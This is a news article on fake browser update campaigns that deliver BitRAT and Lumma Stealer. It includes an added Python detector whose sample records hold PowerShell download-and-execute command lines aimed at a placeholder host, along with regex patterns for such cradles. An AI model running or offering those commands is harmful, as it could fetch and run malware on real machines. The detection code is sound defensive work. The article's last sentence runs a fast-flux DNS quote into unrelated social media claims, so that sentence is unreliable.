Deceptive browser updates are currently serving as a medium for the spread of remote access trojans (RATs) and data-stealing malware like BitRAT and Lumma Stealer (known as LummaC2).
A recent report from cybersecurity firm eSentire highlighted the use of fake browser updates in widespread malware infections, citing incidents involving the infamous SocGholish malware. The report also noted the distribution of FakeBat through similar deceptive update mechanisms in April 2024.
The attack process kicks off when potential victims land on a malicious website containing JavaScript code that redirects them to a counterfeit browser update page with the address “chatgpt-app[.]cloud”.
The fake update page hosts a download link to a ZIP archive file named “Update.zip” stored on Discord, which automatically downloads to the device of the unsuspecting user.
It’s essential to note that threat actors frequently exploit Discord as an attack avenue. Recent research by Bitdefender unveiled over 50,000 harmful links disseminating malware, phishing schemes, and spam via Discord in the past six months.
Inside the downloaded ZIP archive lies another JavaScript file named “Update.js,” which triggers PowerShell scripts for retrieving additional payloads like BitRAT and Lumma Stealer from a remote server in the form of PNG image files.
These payloads also include PowerShell scripts for establishing persistence and a .NET-based loader primarily used to launch the final-stage malware. According to eSentire, the loader is likely being offered as a “malware delivery service,” since it deploys both BitRAT and Lumma Stealer.
BitRAT is a sophisticated RAT allowing threat actors to collect data, mine cryptocurrencies, download additional binaries, and take control of infected systems remotely. On the other hand, Lumma Stealer, available for $250 to $1,000 monthly since August 2022, specializes in extracting information from web browsers, digital wallets, and other sensitive data.
“Fraudulent browser update tactics are increasingly popular among attackers for infiltrating devices and networks,” remarked the company, emphasizing the threat actors’ adeptness in leveraging reputable brands to maximize their impact.
While such attacks typically rely on drive-by downloads and malvertising techniques, a recent report from ReliaQuest unearthed a fresh variant of the ClearFake campaign that tricks users into manually executing malicious PowerShell code disguised as a browser update.
The malevolent website informs visitors about discrepancies in displaying the webpage and prompts them to rectify it by installing a root certificate through a series of steps, including copying obfuscated PowerShell code and executing it in a PowerShell terminal.
“Once the PowerShell code executes, several actions are initiated, such as clearing the DNS cache, displaying a message box, downloading additional PowerShell code, and installing the ‘LummaC2’ malware,” disclosed the company in a statement.
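Both chains described above, the Update.js script spawning PowerShell and the copied-and-pasted “fix” that flushes the DNS cache, pops a message box and pulls a second stage, leave a recognisable process-creation trail. The following is an added example, not code from eSentire or ReliaQuest, that scores constructed Sysmon-style process records against those tells; the records, paths and URLs are constructed placeholders.

```python
import re

# Constructed process-creation records (Sysmon Event ID 1 style), not real telemetry.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'wscript.exe "C:\Users\alice\Downloads\Update\Update.js"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -w hidden -ep bypass -c \"iex (New-Object Net.WebClient).DownloadString('http://example.invalid/a.png')\""},
    {"pid": 400, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -c \"ipconfig /flushdns; [Windows.Forms.MessageBox]::Show('Fixing display'); iex (iwr http://example.invalid/fix)\""},
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -c \"Get-ChildItem C:\\Users\\alice\\Documents\""},
]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
JS_FROM_DOWNLOADS = re.compile(r"\\downloads\\.*\.js\b", re.I)
# Command-line tells of the pasted "fix" described in the ReliaQuest report.
INDICATORS = {
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-Expression|\biex\b", re.I),
    "dns_cache_flush": re.compile(r"ipconfig\s*/flushdns|Clear-DnsClientCache", re.I),
    "message_box": re.compile(r"MessageBox\]::Show", re.I),
    "hidden_or_bypass": re.compile(r"-w(indowstyle)?\s+hidden|-e(p|xecutionpolicy)\s+bypass", re.I),
}

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def analyze(events):
    """Return (pid, rule, detail) triples for suspicious PowerShell launches."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if basename(e["image"]) not in ("powershell.exe", "pwsh.exe"):
            continue
        parent = by_pid.get(e["ppid"])
        # Rule 1: PowerShell spawned by a script host running a .js from the Downloads folder.
        if parent and basename(parent["image"]) in SCRIPT_HOSTS and JS_FROM_DOWNLOADS.search(parent["cmd"]):
            findings.append((e["pid"], "fake_update_js_chain", parent["cmd"]))
        # Rule 2: a download cradle combined with at least one other tell on the same command line.
        hits = [name for name, rx in INDICATORS.items() if rx.search(e["cmd"])]
        if "download_cradle" in hits and len(hits) >= 2:
            findings.append((e["pid"], "paste_and_run_cradle", ",".join(sorted(hits))))
    return findings

if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(*finding)
```

Rule 2 deliberately requires two independent tells, so an ordinary `iwr` in an admin's console does not fire on its own.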
According to insights shared by the cybersecurity firm, Lumma Stealer emerged as one of the top data exfiltration tools in 2023, alongside RedLine and Raccoon.
“The volume of LummaC2-acquired logs put up for sale surged by 110% from Q3 to Q4 2023,” it highlighted. “The increasing appeal of LummaC2 among threat actors is likely due to its high success rate in infiltrating and siphoning off sensitive data stealthily.”
These developments coincide with the recent disclosure by the AhnLab Security Intelligence Center (ASEC) of a new campaign utilizing webhards to distribute malicious installers for adult games and illegitimate versions of Microsoft Office and to disseminate various malware like Orcus RAT, XMRig miner, 3proxy, and XWorm.
Similar attack chains involving websites that offer counterfeit software have led to the deployment of malware loaders like PrivateLoader and TaskLoader, both of which are marketed as pay-per-install (PPI) services that other cybercriminals use to distribute their own malicious payloads.
The findings also follow recent discoveries by Silent Push regarding CryptoChameleon’s substantial reliance on DNSPod[.]com nameservers to bolster its phishing kit framework. DNSPod, a division of the Chinese conglomerate Tencent, has a track record of supporting operations for unlawful bulletproof hosting providers.
“Utilizing DNSPod nameservers, CryptoChameleon employs rapid flux evasion tactics enabling threat actors to swiftly rotate through numerous IPs tied to a single domain,” the firm stated.
“Fast flux grants CryptoChameleon’s infrastructure the ability to bypass conventional defenses, substantially diminishing the value of traditional point-in-time IOCs,” through a minimum of seven core social media profiles and a CIB network exceeding 250 accounts.